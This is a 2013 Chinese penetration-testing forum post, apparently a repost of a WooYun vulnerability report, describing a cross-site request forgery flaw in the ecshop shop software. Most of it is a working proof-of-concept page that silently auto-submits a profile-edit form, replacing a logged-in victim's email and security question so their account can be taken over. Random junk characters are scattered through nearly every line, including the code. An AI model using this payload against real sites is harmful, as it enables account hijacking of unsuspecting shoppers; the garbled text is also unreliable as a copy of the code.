中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:/ A+ {. \8 u+ {1 ?3 I
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现5 R& h8 O, E1 y4 N! x

8 z1 h# c( b6 b- hDemo For:http://www.wooyun.org/bug.php?action=view&id=395
8 k0 z, n- v+ x% i0 i. Y2 ^1 U  R5 C; t* M
详细说明:$ M; Q4 M& h( w& E3 \: D) \
利用csrf和xss可以突破官方所说的“障碍”# g* [( I; d/ ^4 F' @* M
xss版本已经有人说明
2 U7 Y0 |5 ?5 n% b( m  _3 ]这里给出csrf版本+ s. t, I' x+ S/ I* W! ~5 O

" j' j9 {  p2 ~3 p1 B! E漏洞证明:
6 ^3 T, J! @# h' f<html>6 [% B5 a' q3 |9 F8 _* U' z  [7 r
<body>
# Z* T* y0 K1 s7 S& S3 z, h<form action="http://www.wooyun.org/ecshop/user.php" method="POST">8 i. g, q  u8 P# s6 m8 Q' b8 \! X
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">/ t( Z  {0 F' H  }2 U. p. _
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
- {6 U4 h  `& V' r9 o+ K8 V# W<INPUT TYPE="text" NAME="sel_question" value="ecshop">5 u; E) r: Z: v
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
* |: x0 R( y( f</body>
( w$ L! Y( a" s* e<script>6 e+ U" \, Q. |( S
document.forms[0].submit();- L/ r# R- o  D% G1 W$ _
</script>
( i; x$ ~& z: Y</html>
( a# {; [2 b+ Q1 r, S8 {' ]构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
0 Z9 L, r, R2 G$ t9 X; f" O, G% y4 _3 [% x  E9 f* T5 n, n6 Y, Q/ P- |& T# w





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2